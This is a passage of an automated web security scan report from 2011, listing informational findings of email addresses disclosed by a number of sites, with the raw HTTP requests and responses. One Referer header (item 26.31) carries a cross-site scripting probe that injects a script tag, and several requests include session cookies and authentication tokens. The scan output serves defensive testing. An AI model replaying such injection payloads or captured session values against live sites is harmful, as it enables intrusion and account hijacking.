Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14318
Content-Type: text/html; charset=utf-8
Expires: Sun, 24 Apr 2011 15:52:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1303660423&co=1&id=265631; path=/;version=1
Set-Cookie: MSPOK=$uuid-18b94e66-b7b0-49aa-b234-106cb7e83e44; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1Q57 V: 0
Date: Sun, 24 Apr 2011 15:53:43 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1Q57 2011.03.07.16.56.24 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA080, -- Version: 10,0,17133,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.27. https://login.silverlight.net/resources/script/omniture/omniture.combined.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /resources/script/omniture/omniture.combined.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/script/omniture/omniture.combined.min.js HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=z3s0bivcqi4rqh453jygfl55; forums.ReturnUrl=http://www.silverlight.net/default.aspx

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Dec 2010 00:19:52 GMT
Accept-Ranges: bytes
ETag: "b2459c9a4a0cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:16 GMT
Content-Length: 23800

...var s_account = "msstoslvnet"; var omniGuidPath = "://www.iis.net/omniture/analyticsid.aspx"; if (window.location.hostname.toLowerCase().indexOf("silverlight.net") == -1) { var s2 = s_account.split
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.28. https://portal.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: portal_=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Set-Cookie: portal_hash=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div style='font-size:10px;margin-top:4px;color:#888888'>(e.g., John Doe@abc.com) </div>
...[SNIP]...
<a href='mailto:info@actividentity.com'>
...[SNIP]...
<a href="mailto:partners@actividentity.com">partners@actividentity.com</a>
...[SNIP]...

26.29. https://protect724.arcsight.com/4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://protect724.arcsight.com
Path:   /4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js

Issue detail

The following email address was disclosed in the response:

Request

GET /4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js HTTP/1.1
Host: protect724.arcsight.com
Connection: keep-alive
Referer: https://protect724.arcsight.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; jive.server.info="serverName=protect724.arcsight.com:serverPort=443:contextPath=:localName=sgauwa100p:localPort=9201:localAddr=127.0.0.1"; JSESSIONID=7601BD8FD22C0BE72201B028BE68CCE8.node0; BIGipServerPool_97_SM11-7001=1108904202.22811.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:19:03 GMT
Server: Apache-Coyote/1.1
X-JAL: 3
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
JP: D=21685 t=1303676344289279
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 749769

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

26.30. https://protect724.arcsight.com/index.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://protect724.arcsight.com
Path:   /index.jspa

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.jspa HTTP/1.1
Host: protect724.arcsight.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; jive.server.info="serverName=protect724.arcsight.com:serverPort=443:contextPath=:localName=sgauwa100p:localPort=9201:localAddr=127.0.0.1"; JSESSIONID=7601BD8FD22C0BE72201B028BE68CCE8.node0; BIGipServerPool_97_SM11-7001=1108904202.22811.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:28:27 GMT
Server: Apache-Coyote/1.1
X-JAL: 290
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=297041 t=1303676906794567
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 95908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
individual outside the Arcsight APAC partner community.\r\n\r\nThe owners of this group reserve the right to membership to join this community\r\n\r\nFor any questions kindly contact the following:-\r\njwong@arcsight.com\r\nvkumar@arcsight.com\r\nfteo@arcsight.com",
"parent":"false",
"parentID":"-1",
"type":"GROUP",
"objectURL":"/groups/apac-partners-group",

...[SNIP]...
<a href="mailto:protect724@arcsight.com">
...[SNIP]...
<a href="mailto:info@arcsight.com">info@arcsight.com</a>
...[SNIP]...

26.31. https://psr.infusionsoft.com/js/sink_jq.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /js/sink_jq.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /js/sink_jq.jsp HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp?pageName=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000409)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 25 Apr 2011 13:25:43 GMT
Content-Type: text/javascript;;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:25:43 GMT
Content-Length: 1143910


/* FILE: /js/prototype/lib/prototype.js */
/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT
...[SNIP]...
gress();
};

};


})(jQuery);


/* FILE: /js/jquery/jquery.maxlength.js */
/**
* jQuery Maxlength plugin
* @version $Id: jquery.maxlength.js 18 2009-05-16 15:37:08Z emil@anon-design.se $
* @package jQuery maxlength 1.0.5
* @copyright Copyright (C) 2009 Emil Stjerneman / http://www.anon-design.se
* @license GNU/GPL, see LICENSE.txt
*/

(function(A) {
A
...[SNIP]...

26.32. https://psr.infusionsoft.com/js/sink_js.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /js/sink_js.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/sink_js.jsp?b=1.22.3.32 HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/AddForms/processFormSecure.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 25 Apr 2011 13:36:47 GMT
Content-Type: text/javascript;;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:36:47 GMT
Content-Length: 208578


/* FILE: /js/jquery/plugins/urlencode/urlEncode.js */
jQuery.extend({URLEncode:function(c){var o='';var x=0;c=c.toString();var r=/(^[a-zA-Z0-9_.]*)/;
while(x<c.length){var m=r.exec(c.subst
...[SNIP]...
t it to work in every possible situation on every browser,
       you will be disappointed. Use it sparingly, and don't use it for anything
       critical. Otherwise, have fun with it!

   AUTHOR: Larry Stevens (McLars@eyebulb.com) This work is in the public domain,
                   and it is not supported in any way. Use it at your own risk.
*/


(function($){

   var dropShadowZindex = 1; //z-index counter

   $.fn.dropShadow = function(opt
...[SNIP]...
<vivinp@infusionsoft.com>
...[SNIP]...

26.33. http://seal.controlcase.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seal.controlcase.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php?page=showCert&cId=3063048179 HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:10:09 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=6acda14de92cdb5a62e55e1a4a4b0b6b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4550
Content-Type: text/html; charset=ISO-8859-1

<head>
   <title>Controlcase</title>
</head>
<link rel="stylesheet" type="text/css" href="templates/css/style.css" />

<form name="showCert" method='POST' action='index.php?page=showCert'>
<Body o
...[SNIP]...
<td align='center' colspan='2' class= 'address'>. 2011 ControlCase . 2010 Corporate Ridge, Suite 700 McLean, VA 22102 USA . contact@controlcase.com . Ph: 703.483.6383 . Fax: 703.636.4888</td>
...[SNIP]...

26.34. http://search.bluewin.ch/js/osn/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.bluewin.ch
Path:   /js/osn/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/osn/jquery.cookie.js HTTP/1.1
Host: search.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:49:45 GMT
Last-Modified: Wed, 19 Jan 2011 06:37:08 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Accept-Ranges: bytes
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

26.35. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXContactUs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXContactUs

Issue detail

The following email address was disclosed in the response:

Request

GET /webapp/wcs/stores/servlet/INTXContactUs HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:14 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000JEHZujswBDR5wgEMRinwd8Q:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5245


<!-- Start of JSTLEnvironmentSetup.jspf -->


   
...[SNIP]...
<a href="mailto:customersupport@identityguard.com">customersupport@identityguard.com</a>
...[SNIP]...

26.36. https://secure.krypt.com/js/cart.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /js/cart.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/cart.js HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:06 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 12245

// $Id: cart.js 4849 2011-03-09 23:03:37Z jrlenz $

var cf_Posting = false;

function cart_Clear() {
   jConfirm("<strong>This can not be undone!</strong><br />Are you <strong>SURE</strong> you want to
...[SNIP]...
<br />Please contact sales@krypt.com to place your order.", function(r) {
                       window.location = 'http://www.krypt.com/contact/';
                   });
               } else {
                   cf_Posting = false;
               }
           }
       }
   );
}
function cart_ErrAlert(fields) {
   var
...[SNIP]...
<a href="mailto:sales@krypt.com">sales@krypt.com</a>
...[SNIP]...

26.37. http://sensic.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensic.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: sensic.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:33:27 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 07:57:02 GMT
ETag: "99c42c-3077-4a154f84d8f80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 12407

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<a href=
"mailto:datenschutz@nurago.com">datenschutz@nurago.com</a>
...[SNIP]...
<a href=
"mailto:datenschutz@nurago.com">datenschutz@nurago.com</a>
...[SNIP]...
<a href="mailto:nurago@nurago.com">nurago@nurago.com</a>
...[SNIP]...

26.38. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

Issue detail

The following email address was disclosed in the response:

Request

GET /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:40:13 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://smartcompanygrowth.com/xmlrpc.php
Set-Cookie: PHPSESSID=56b30beb6b215f9bb9cb2ca1888fedb3; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 64437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

<!--
...[SNIP]...
<input type='hidden' name='business' value='kwalinskas@smartcompanygrowth.com' />
...[SNIP]...
<input type='hidden' name='business' value='kwalinskas@smartcompanygrowth.com' />
...[SNIP]...
<input type='hidden' name='business' value='kwalinskas@smartcompanygrowth.com' />
...[SNIP]...

26.39. http://smartcompanygrowth.com/wp-content/plugins/wp-recaptcha/recaptcha.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /wp-content/plugins/wp-recaptcha/recaptcha.css

Issue detail

The following email addresses were disclosed in the response:

Request

GET /wp-content/plugins/wp-recaptcha/recaptcha.css HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8e07c6393cbc0d486d7317d1e46a398

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:34:16 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Jan 2011 02:20:02 GMT
ETag: "2d9c278-6cb-498fbe7eb1880"
Accept-Ranges: bytes
Content-Length: 1739
Content-Type: text/css

/* RECAPTCHA STYLING */
.recaptcha-error {
font-size: 1.8em;
padding-bottom: 8px;
}
/* END RECAPTCHA STYLING */

/* MAILHIDE STYLING */

/* This is for plain text emails i.e. haha@lol.com - TEXT*/
.mh-plaintext {
background:transparent url(email.png) no-repeat scroll left center;
border:medium none;
color:#2277DD;
height:16px;
padding:2px 2px 4px 20px;
}

/* This is for plain text emails i.e. haha@lol.com - DOTS*/
.mh-plaintext a, .mh-plaintext a:hover, .mh-plaintext a:visited, .mh-plaintext a:visited:hover {
color: #FF7700;
font-weight: bolder;
text-decoration: none;
border: 0;
backgrou
...[SNIP]...
<a href="mailto:ohnoes@pwnies.com">
...[SNIP]...
<a href="mailto:ohnoes@pwnies.com">
...[SNIP]...

26.40. http://static.ch9.ms/scripts/ratings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ch9.ms
Path:   /scripts/ratings.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/ratings.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1 HTTP/1.1
Host: static.ch9.ms
Proxy-Connection: keep-alive
Referer: http://channel9.msdn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: application/x-javascript
Accept-Ranges: bytes
ETag: "2839f677b20cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 14790
Age: 205114
Date: Sun, 24 Apr 2011 16:00:24 GMT
Last-Modified: Fri, 22 Apr 2011 05:59:40 GMT
Expires: Mon, 02 May 2011 07:15:35 GMT
Connection: keep-alive

/*!
* jQuery UI 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.com
...[SNIP]...
his.element[0],c,d)===false||c.isDefaultPrevented())}}})(jQuery);


/*
* jQuery UI Stars v3.0.1
* http://plugins.jquery.com/project/Star_Rating_widget
*
* Copyright (c) 2010 Marek "Orkan" Zajac (orkans@gmail.com)
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
